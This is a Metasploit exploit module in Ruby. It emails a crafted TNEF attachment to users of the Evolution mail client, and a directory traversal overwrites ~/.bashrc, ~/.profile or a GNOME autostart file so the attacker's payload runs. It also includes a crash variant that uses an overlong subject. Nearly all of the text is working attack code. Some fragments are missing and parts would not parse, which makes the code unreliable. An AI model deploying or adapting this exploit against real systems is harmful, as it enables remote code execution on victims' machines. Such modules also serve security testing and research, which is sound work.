require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities', 'Description' => %q{ The Evolution TNEF Attachment decoder plugin is affected by several directory traversal and buffer overflow vulnerabilities. The directory traversal vulnerabilities allow attackers to overwrite or create local files with the privileges of the target user. Exploiting the buffer overflow vulnerabilities allows for arbitrary code execution with the privileges of the target user. }, 'Author' => 'Yorick Koster ', 'Version' => '1', 'References' => [ ['URL', ''], ], 'Platform' => ['unix', 'linux', 'bsd'], 'Arch' => ARCH_CMD, 'Handler' => Msf::Handler::None, 'Session' => Msf::Sessions::CommandShell, 'Targets' => [ ['GNOME (~/.config/autostart/sploit.desktop)', {}], ['Bash (~/.bashrc)', {}], ['Shell (~/.profile)', {}], ['Crash Evolution', {}], ], 'DefaultTarget' => 0)) register_options( ['MAILSUBJECT', [false, "The subject of the sent email"]) ], self.class) end def exploit msg = msg.mime_defaults msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) = datastore['MAILTO'] msg.from = datastore['MAILFROM'] body = Rex::Text.encode_base64(create_tnef_exploit(payload), "\r\n") content_type = "application/ms-tnef" content_disposition = "attachment;\r\n\tname=\"winmail.dat\"" msg.add_part(body, content_type, "base64", content_disposition) send_message(msg.to_s) end def create_tnef_exploit(payload) sploit = create_tnef_header filename = "foobar.txt" content = "" if =~ /Bash/ filename = "/../../../../.bashrc\x00" content = "\# ~/.bashrc: executed by bash(1) for non-login shells.\n\n" content << "[ -z \"$PS1\" ] && return\n" content << "export HISTCONTROL=ignoredups\n" content << "export HISTCONTROL=ignoreboth\n" content << "shopt -s checkwinsize\n" content << "if [ -f /etc/bash_completion ]; then\n" content << " . /etc/bash_completion\n" content << "fi\n" content << "\n#{payload.encoded}\n" end if =~ /Shell/ filename = "/../../../../.profile\x00" content = "\# ~/.profile: executed by the command interpreter for login shells.\n\n" content << "if [ -n \"$BASH_VERSION\" ]; then\n" content << " if [ -f \"$HOME/.bashrc\" ]; then\n" content << " . \"$HOME/.bashrc\"\n" content << " fi\n" content << "fi\n\n" content << "if [ -d \"$HOME/bin\" ] ; then\n" content << " PATH=\"$HOME/bin:$PATH\"\n" content << "fi\n" content << "\n#{payload.encoded}\n" end if =~ /GNOME/ filename = "/../../../../.config/autostart/sploit.desktop\x00" content = "[Desktop Entry]\n" content << "Version=1.0\n" content << "Type=Application\n" content << "Name=Sploit\n" content << "Comment=\n" content << "Exec=#{payload.encoded}\n" content << "StartupNotify=false\n" content << "Terminal=false\n" content << "Hidden=false\n" end if =~ /Crash/ # triggers crash through an overly long vcard file name sploit << "\x01" # Level type LVL_MESSAGE sploit << "\x08\x80" # Name attMessageClass (0x8008) sploit << "\x07\x00" # Type atpWord (0x0007) sploit << "\x0c\x00\x00\x00" # Len 0x0000000c sploit << "\x49\x50\x4d\x2e\x43\x6f\x6e\x74\x61\x63\x74\x00" # IPM.Contact sploit << "\xe0\x03" # Checksum subject = Rex::Text.rand_text_alpha(1023) subject << "\x00" sploit << "\x01" # Level type LVL_MESSAGE sploit << "\x04\x80" # Name attSubject (0x8004) sploit << "\x01\x00" # Type atpString (0x0001) sploit << [subject.length].pack("V") # Len sploit << subject sploit << tnef_checksum(subject) # Checksum return sploit end # start of TNEF attachment sploit << "\x02" # Level type LVL_ATTACHMENT sploit << "\x02\x90" # Name attAttachRenddata (0x9002) sploit << "\x06\x00" # Type atpByte (0x0006) sploit << "\x0e\x00\x00\x00" # Len 0x0000000e sploit << "\x01\x00\xff\xff\xff\xff\x20\x00\x20\x00\x00\x00\x00\x00" sploit << "\x3d\x04" # Checksum sploit << "\x02" # Level type LVL_ATTACHMENT sploit << "\x10\x80" # Name attAttachTitle (0x8010) sploit << "\x01\x00" # Type atpString (0x0001) sploit << [filename.length].pack("V") # Len sploit << filename sploit << tnef_checksum(filename) sploit << "\x02" # Level type LVL_ATTACHMENT sploit << "\x0f\x80" # Name attAttachData (0x800f) sploit << "\x06\x00" # Type atpByte (0x0006) sploit << [content.length].pack("V") # Len sploit << content sploit << tnef_checksum(content) return sploit end def create_tnef_header # TNEF Header buf = "\x78\x9f\x3e\x22" # Signature 0x223e9f78 buf << "\x00\x00" # Key # TNEF Attributes buf << "\x01" # Level type LVL_MESSAGE buf << "\x06\x90" # Name attTnefVersion (0x9006) buf << "\x08\x00" # Type atpDword (0x0008) buf << "\x04\x00\x00\x00" # Len 0x00000004 buf << "\x00\x00\x01\x00" buf << "\x01\x00" # Checksum buf << "\x01" # Level type LVL_MESSAGE buf << "\x07\x90" # Name attOemCodepage (0x9007) buf << "\x06\x00" # Type atpByte (0x0006) buf << "\x08\x00\x00\x00" # Len 0x00000008 buf << "\xe4\x04\x00\x00\x00\x00\x00\x00" buf << "\xe8\x00" # Checksum buf << "\x01" # Level type LVL_MESSAGE buf << "\x0d\x80" # Name attPriority (0x800d) buf << "\x04\x00" # Type atpShort (0x0004) buf << "\x02\x00\x00\x00" # Len 0x00000002 buf << "\x02\x00" buf << "\x02\x00" # Checksum return buf end def tnef_checksum(buf = '') checksum = 0; buf.each_byte { |b| checksum += b } return [checksum % 65536].pack("v") end end